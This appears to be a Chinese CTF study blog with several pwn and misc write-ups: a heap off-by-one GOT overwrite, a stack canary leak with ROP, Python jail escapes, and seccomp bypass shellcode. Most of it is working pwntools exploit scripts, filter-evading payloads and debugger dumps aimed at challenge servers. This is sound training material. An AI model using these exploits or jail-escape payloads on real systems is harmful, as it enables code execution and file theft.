  if ( *((_QWORD *)&heaparray + v1) )
  {
    printf(
      "Size : %ld\nContent : %s\n",  //%s的格式化字符串,可以利用got表的地址泄露
      **((_QWORD **)&heaparray + v1),
      *(const char **)(*((_QWORD *)&heaparray + v1) + 8LL));
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v3;
}

函数到这里就分析完了,开始写思路

1
我们先申请一个0x18/0x28的creat(实际上就是两个堆块一个用于储存地址,一个用于储存内容),利用off_by_one去修改下个堆块的大小为0x40,先申请第二个creat,然后再把修改一个堆块送入/bin/sh同时修改第二个堆块的大小,然后释放第二个堆块,申请0x30的creat,并且内容填为free_got表的地址。最后show一下就可以泄露出free的地址,从而计算出system的地址,在把free_got的地址覆盖为system的地址,最后我们在delete(1)就可以实现system(/bin/sh)。

这里加上几个解释点

1
2
3
4
1. 为什么用0x18/0x28
   应为0x18会被自动化整0x20,正好覆盖掉pre_size,然后我们又溢出了一个字节,就可以覆盖到size,从而改变下一个堆块的大小。
2. 为什么会出现两个数组合并成一个的现象(后面调试的时候会出现),根据堆的遍历机制,当遍历到size为0x40的时候,就直接跳到            top_chunk的位置就,从而导致没识别出第四个堆块。
3. 为什么第三次要用0x30,0x30 + 0x10 = 0x40正好对应上了。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
from pwn import *
from LibcSearcher import *

# 设置日志级别为 debug,方便调试
context.log_level = 'debug'

# 连接远程服务
p = remote("pwn.challenge.ctf.show", 28289)

# 加载本地 ELF 文件
e = ELF("./pwn")

# 获取 free 的 GOT 地址
free_got = e.got["free"]

# 定义操作函数
def creat(size, content):
    p.sendafter(b"Your choice :", b"1")
    p.sendlineafter(b"Size of Heap : ", str(size))
    p.sendlineafter(b"Content of heap:", content)

def edit(index, content):
    p.sendlineafter(b"Your choice :", b"2")
    p.sendlineafter(b"Index :", str(index))
    p.sendafter(b"Content of heap : ", content)

def show(index):
    p.sendlineafter(b"Your choice :", b"3")
    p.sendlineafter(b"Index :", str(index))

def delete(index):
    p.sendlineafter(b"Your choice :", b"4")
    p.sendlineafter(b"Index :", str(index))

# 堆喷射与 UAF 利用步骤
creat(0x18, b"a"*4)              # 创建第一个 chunk (index 0)
creat(0x10, b"b"*4)              # 创建第二个 chunk (index 1)
edit(0, b"/bin/sh\x00" + b"a"*0x10 + b'\x41')  # 修改 chunk 0,伪造 size 字段为 0x41
delete(1)                        # 释放 chunk 1,进入 fastbin
creat(0x30, p64(0)*4 + p64(0x10) + p64(free_got))  # 分配大块覆盖 chunk 1,并在其中写入 free@got 地址
show(1)                          # 泄露 free 地址
p.recvuntil(b"Content : ")
free_addr = u64(p.recv(6).ljust(8, b"\x00"))  # 读取泄露的 free 地址
print(f"Free address: {hex(free_addr)}")

# 使用 LibcSearcher 确定 libc 版本和基地址
libc = LibcSearcher("free", free_addr)
libc_base = free_addr - libc.dump("free")
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")

# 将 free@got 指向 system
edit(1, p64(system_addr))

# 触发 free(0),即调用 system("/bin/sh")
delete(0)

# 进入交互模式
p.interactive()
1
2
3
No matched libc, please add more libc or try others
去网上找一下
发现是libc6_2.27-3ubuntu1.6_amd64。换上去就行了

这样这题基本解决了,进行动态调试详细了解一下。

第一个次create

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x603290
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x6032b0
Size: 0x20 (with flag bits: 0x21)

Top chunk | PREV_INUSE
Addr: 0x6032d0
Size: 0x20d30 (with flag bits: 0x20d31)
1
2
3
4
5
6
pwndbg> x/30gx  0x603290
0x603290:	0x0000000000000000	0x0000000000000021  //堆块大小0x21
0x6032a0:	0x0000000000000018	0x00000000006032c0  //0x00000000006032c0 --->0x0000000a61616161
-------------------------------------------------------------------------------------------------------------------
0x6032b0:	0x0000000000000000	0x0000000000000021  //堆块大小0x21
0x6032c0:	0x0000000a61616161	0x0000000000000000  //aaaa

第二个次create

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x603290
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x6032b0
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x6032d0
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x6032f0
Size: 0x20 (with flag bits: 0x21)

Top chunk | PREV_INUSE
Addr: 0x603310
Size: 0x20cf0 (with flag bits: 0x20cf1)
1
2
3
4
5
6
7
8
9
10
11
12
pwndbg> x/50gx  0x603290
0x603290:	0x0000000000000000	0x0000000000000021   //堆块大小0x21
0x6032a0:	0x0000000000000018	0x00000000006032c0   //0x00000000006032c0 --->0x0000000a61616161
-------------------------------------------------------------------------------------------------------------------
0x6032b0:	0x0000000000000000	0x0000000000000021  //堆块大小0x21
0x6032c0:	0x0000000a61616161	0x0000000000000000  //aaaa
-------------------------------------------------------------------------------------------------------------------
0x6032d0:	0x0000000000000000	0x0000000000000021 //堆块大小0x21
0x6032e0:	0x0000000000000010	0x0000000000603300 //0x0000000000603300 --->0x0000000a62626262
-------------------------------------------------------------------------------------------------------------------
0x6032f0:	0x0000000000000000	0x0000000000000021 //堆块大小0x21
0x603300:	0x0000000a62626262	0x0000000000000000 //bbbb

执行第一个edit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x35324000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x35324290
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x353242b0
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x353242d0
Size: 0x40 (with flag bits: 0x41)  //第二个堆块大小已经被改成0x40了,这也是为什么是0x30的原因之一。

Top chunk | PREV_INUSE
Addr: 0x35324310
Size: 0x20cf0 (with flag bits: 0x20cf1)
1
2
3
4
5
6
7
8
9
10
11
12
pwndbg> x/30gx 0x35324290
0x35324290:	0x0000000000000000	0x0000000000000021 //堆块大小0x21
0x353242a0:	0x0000000000000018	0x00000000353242c0 //0x00000000353242c0 --->0x0068732f6e69622f(/bin/sh)
-------------------------------------------------------------------------------------------------------------------
0x353242b0:	0x0000000000000000	0x0000000000000021 //堆块大小0x21
0x353242c0:	0x0068732f6e69622f	0x6161616161616161 //b'/bin/sh\x00' + b'a'*0x10
-------------------------------------------------------------------------------------------------------------------
0x353242d0:	0x6161616161616161	0x0000000000000041 //0x21被覆盖为0x41
0x353242e0:	0x0000000000000010	0x0000000035324300 //0x0000000035324300 --->0x0000000a62626262
-------------------------------------------------------------------------------------------------------------------
0x353242f0:	0x0000000000000000	0x0000000000000021 //堆块大小0x21
0x35324300:	0x0000000a62626262	0x0000000000000000 //bbbb

第一次delete

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x35324000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x35324290
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x353242b0
Size: 0x20 (with flag bits: 0x21)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0x353242d0
Size: 0x40 (with flag bits: 0x41)
fd: 0x35324   //被释放了

Top chunk | PREV_INUSE
Addr: 0x35324310
Size: 0x20cf0 (with flag bits: 0x20cf1)
1
2
3
4
5
6
7
8
9
10
11
12
pwndbg> x/30gx 0x35324290
0x35324290:	0x0000000000000000	0x0000000000000021 //堆块大小0x21
0x353242a0:	0x0000000000000018	0x00000000353242c0 //0x00000000353242c0 --->0x0068732f6e69622f(/bin/sh)
-------------------------------------------------------------------------------------------------------------------
0x353242b0:	0x0000000000000000	0x0000000000000021 //堆块大小0x21
0x353242c0:	0x0068732f6e69622f	0x6161616161616161 //b'/bin/sh\x00' + b'a'*0x10
-------------------------------------------------------------------------------------------------------------------
0x353242d0:	0x6161616161616161	0x0000000000000041 
0x353242e0:	0x0000000000035324	0xa752a1d4c2f9e9c9//已被free
-------------------------------------------------------------------------------------------------------------------
0x353242f0:	0x0000000000000000	0x0000000000000021
0x35324300:	0x0000000000035324	0xa752a1d4c2f9e9c9//已被free

第三次create

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x35324000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x35324290
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x353242b0
Size: 0x20 (with flag bits: 0x21)

Allocated chunk | PREV_INUSE
Addr: 0x353242d0
Size: 0x40 (with flag bits: 0x41)  //第三块正好是被释放第一块所在的地方

Top chunk | PREV_INUSE
Addr: 0x35324310
Size: 0x20cf0 (with flag bits: 0x20cf1)
1
2
3
4
5
6
7
8
9
10
11
pwndbg> x/30gx 0x35324290
0x35324290:	0x0000000000000000	0x0000000000000021 //堆块大小0x21
0x353242a0:	0x0000000000000018	0x00000000353242c0 //0x00000000353242c0 --->0x0068732f6e69622f(/bin/sh)
-------------------------------------------------------------------------------------------------------------------
0x353242b0:	0x0000000000000000	0x0000000000000021 //堆块大小0x21
0x353242c0:	0x0068732f6e69622f	0x6161616161616161 //b'/bin/sh\x00' + b'a'*0x10
-------------------------------------------------------------------------------------------------------------------
0x353242d0:	0x6161616161616161	0x0000000000000041 //堆块大小0x41
0x353242e0:	0x0000000000000000	0x0000000000000000 //p64(0) * 4
0x353242f0:	0x0000000000000000	0x0000000000000000
0x35324300:	0x0000000000000010	0x0000000000602018 //p64(0x10) + free的got地址
1
2
注释:为什么打印出来的是free()的真实地址,而不是free_got的地址?
你看到的是 free 的真实地址,而不是 GOT 地址,因为你从 GOT 条目中读出了它的内容(也就是解引用了一次),而 GOT 条目里存的就是 free() 的真实地址。

把free_got的地址覆盖成system的地址,最后delete(0):

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x0000000000602018
00:0000│  0x602018 (free@got[plt]) —▸ 0x729199e58750 (system) ◂— endbr64 //free_got -->system
01:0008│  0x602020 (_exit@got.plt) —▸ 0x400696 (_exit@plt+6) ◂— push 1
02:0010│  0x602028 (puts@got[plt]) —▸ 0x729199e87be0 (puts) ◂— endbr64 
03:0018│  0x602030 (__stack_chk_fail@got.plt) —▸ 0x4006b6 (__stack_chk_fail@plt+6) ◂— push 3
04:0020│  0x602038 (printf@got[plt]) —▸ 0x729199e60100 (printf) ◂— endbr64 
05:0028│  0x602040 (read@got[plt]) —▸ 0x729199f1ba50 (read) ◂— endbr64 
06:0030│  0x602048 (malloc@got[plt]) —▸ 0x729199ead650 (malloc) ◂— endbr64 
07:0038│  0x602050 (setvbuf@got[plt]) —▸ 0x729199e88550 (setvbuf) ◂— endbr64
1
2
3
4
5
6
pwndbg> find 0x729199e58750, +0x200000, "/bin/sh"
0x729199fcb42f
warning: Unable to access 16000 bytes of target memory at 0x72919a011937, halting search.
1 pattern found.
pwndbg> x/s 0x729199fcb42f
0x729199fcb42f:	"/bin/sh"

动调也完成了,这题到这里就完工了。

OK到这里,off_by_one也学了💻📚,pwn143是堆溢出💾🧨,下午先学学别的知识🧠📖,晚上继续写pwn🌙⌨️,fighting💪🔥

堆溢出

这里堆溢出的知识点是House of Force。从另一篇文章开始写全部,放在堆的学习分类里面。

发表于 更新于 分类于

一个算是综合点的题目

  1. 主要是为了记录这个泄露canary的模板

  2. 思路就是puts输出的时候利用栈溢出覆盖/x00,让后面的canary泄露出来,然后在利用libc泄露完成此题(重点在泄露canary)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    from pwn import *
    from LibcSearcher import *

    r=remote('node5.buuoj.cn',28050)
    #r=process('./babystack')
    elf=ELF('./babystack')
    #context.log_level='debug'
    offset = 0x80+8
    #泄露canary
    r.sendlineafter(">>",'1')
    payload=b'a'*offset
    r.sendline(payload)

    r.sendlineafter('>>','2')
    r.recvuntil('a\n')
    canary=u64(r.recv(7).rjust(8,b'\x00'))
    print(hex(canary))

    pop_rdi=0x400a93
    puts_got=elf.got['puts']
    puts_plt=elf.plt['puts']
    main_addr=0x400908

    #泄露puts函数的got表地址
    payload=b'a'*offset+p64(canary)+p64(0)
    payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
    r.sendlineafter(">>",'1')
    r.sendline(payload)
    r.sendlineafter(">>",'3')

    r.recv()

    puts_addr=u64(r.recv(6).ljust(8,b'\x00'))

    #找到对应的libc版本
    libc=LibcSearcher('puts',puts_addr)

    #计算system函数和字符串‘/bin/sh’在程序里的实际地址
    libc_base=puts_addr-libc.dump('puts')
    system=libc_base+libc.dump('system')
    binsh=libc_base+libc.dump('str_bin_sh')

    #构造rop攻击获取shell
    payload=b'a'*offset+p64(canary)+p64(0) + p64(pop_rdi)+p64(binsh)+p64(system)
    r.sendlineafter('>>','1')
    r.sendline(payload)
    r.sendlineafter('>>','3')

    r.interactive()

    参考博客

    1
    https://blog.csdn.net/mcmuyanga/article/details/109776976

发表于 更新于 分类于

这题有点难度(我根本找不到漏洞,如果没有看wp,嘻嘻)

  1. 直接看漏洞所在地

    1

  2. 所以我们只要把rax的值改成backdoor函数就可以了

  3. 可以看到给rax赋值的是var_18

    2

  4. 算一下偏移

    3

​ 还要减去密码的长度 0x48 - 0x0f = 0x3a

  1. exp

    1
    2
    3
    4
    5
    6
    7
    from pwn import *
    r = remote('node5.buuoj.cn',25722)
    backdoor = 0x400e88
    r.sendlineafter(': ','admin')
    payload = b'2jctf_pa5sw0rd'+ b'\x00'*0x3a + p64(backdoor)
    r.sendlineafter(': ',payload)
    r.interactive()

发表于 更新于 分类于

遇到一个没见过的题型,记录一下

  1. 首先怎么判断chm文件,ctf中文件类型的判断也很重要

      1. 用010查头,如果出现ITSF,很大可能是chmwenjian

      2. 用脚本查

        1
        2
        3
        4
        5
        6
        7
        8
        import chm

        try:
            chmfile = chm.CHMFile()
            chmfile.LoadCHM('challenge')
            print("这是一个有效的CHM文件")
        except Exception as e:
            print("这不是一个有效的CHM文件")

        这办法要按chm,我安失败了,安装成功的试试。

  2. 然后就需要一个chm解包工具了CHMUnpacker(付费)这里还有个免费的工具,或者用window里的一个工具hh.exe。

    1
    hh.exe -decompile xxxxxxxx

  3. 解包后(暂时写不来…..)

发表于 更新于 分类于

Pyjail

Pyjail1

1
2
3
4
5
6
7
8
9
10
11
def chall():
    user_input = input("Give me your code: ")

    # 过滤关键字
    forbidden_keywords = ['import', 'eval', 'exec', 'open', 'file']
    for keyword in forbidden_keywords:
        if keyword in user_input:
            print(f"Forbidden keyword detected: {keyword}")
            return
    
    result = eval(user_input)

禁用了[‘import’, ‘eval’, ‘exec’, ‘open’, ‘file’]

Payload1:

1
"print(getattr(__builtins__, '__imp'+'ort__')('os').listdir('/tmp'))"

执行系统命令来列出/tmp目录下的文件。

'__imp' + 'ort__' 拼接后形成 '__import__',但代码检查时不会检测到完整的'import'字符串

getattr(__builtins__, '__imp'+'ort__') 的作用是:

  • __builtins__ 是Python的一个内置模块,包含了所有内置函数和变量
  • getattr(object, name) 函数返回对象的命名属性的值
  • 这里我们获取 __builtins__ 模块中的 __import__ 函数

('os') 部分:

  • 调用获取到的 __import__ 函数,参数为 'os'
  • 这相当于执行了 import os,但绕过了对import关键字的直接检查

.listdir('/tmp') 部分:

  • 调用导入的os模块的listdir方法
  • listdir('/tmp') 会列出/tmp目录下的所有文件和文件夹

Payload2:

1
print(getattr(__builtins__, 'o'+'pen')('/tmp/flag.txt').read())

.read() 部分:

  • 调用文件对象的 read 方法
  • 这会读取文件的全部内容,并返回一个字符串

Pyjail2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def chall():
    user_input = input("Give me your code: ")

    # 过滤关键字
    forbidden_keywords = ['import', 'eval', 'exec', 'open', 'file']
    for keyword in forbidden_keywords:
        if keyword in user_input:
            print(f"Forbidden keyword detected: {keyword}")
            return
    
    # 过滤特殊字符
    forbidden_chars = ['.', '_', '[', ']', "'", '"']
    for char in forbidden_chars:
        if char in user_input:
            print(f"Forbidden character detected: {char}")
            return

    result = eval(user_input)

payload

1
print(getattr(getattr(getattr(globals(),chr(103)+chr(101)+chr(116))(chr(95)+chr(95)+chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)+chr(95)+chr(95)),chr(111)+chr(112)+chr(101)+chr(110))(chr(47)+chr(116)+chr(109)+chr(112)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)),chr(114)+chr(101)+chr(97)+chr(100))())
  • 禁止关键字import, eval, exec, open, file
  • 禁止字符., _, [, ], ', "

解题思路

由于直接使用open函数和点号访问属性被禁止,我们需要绕过过滤:

  1. 使用chr()函数通过ASCII码构造字符串,避免使用禁止字符。
  2. 使用getattr()函数通过字符串名称访问属性和方法,避免使用点号。
  3. 通过globals()__builtins__间接获取open函数。
  4. 最终调用open('/tmp/flag.txt').read()读取文件内容,并用print确保输出。

发表于 更新于 分类于

  1. 关键词眼:mov rsi, rax;说明scanf也可以调用system

  2. exp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    from pwn import *
    context(arch='amd64',os='linux',log_level='debug')
    elf = ELF('./pwn125')
    #r = process('./pwn125')
    r = remote("pwn.challenge.ctf.show",xxxxx)

    call_system = 0x400672
    #0x2000为偏移量
    payload = b'/bin/sh\x00' + cyclic(0x2000) + p64(call_system)

    r.sendline(payload)
    r.interactive()

发表于 更新于 分类于

sandbox_orw

sandbox一般就是禁用了execve函数使我们没办法直接通过system(/bin/sh\x00)来getshell。如果会出现prctl,seccomp的话很可能就要用orw进行绕过。就是利用open,read,write(orw)。

首先用seccomp-tools查看沙箱

1
2
3
sudo apt install gcc ruby-dev
sudo gem install seccomp-tools
seccomp-tools dump ./elf

shellcode绕过

x32

汇编代码

1
2
3
4
#0x67616c66根据文件名改动
shellcode=asm('push 0x0;push 0x67616c66;mov ebx,esp;xor ecx,ecx;xor edx,edx;mov eax,0x5;int 0x80')
shellcode+=asm('mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x100;int 0x80')
shellcode+=asm('mov eax,0x4;mov ebx,0x1;int 0x80')

利用pwntools

1
2
3
4
payload = shellcraft.i386.open('flag.txt')
payload += shellcraft.i386.read(0x3, save_to, 0x100)
payload += shellcraft.i386.write(0x1, save_to, 0x100)
sh.sendline(asm(payload))

x64

汇编代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
shellcode=f"""
xor rsi,rsi;
xor rdx,rdx;
push rdx;
mov rax,{convert_str_asmencode("././flag")};#根据文件名改动
push rax;
mov rdi,rsp;
xor rax,rax;
mov al,2;
syscall;
mov rdi,rax;
mov dl,0x40;
mov rsi,rsp
mov al,0;
syscall;
xor rdi,rdi;
mov al,1;
syscall;
"""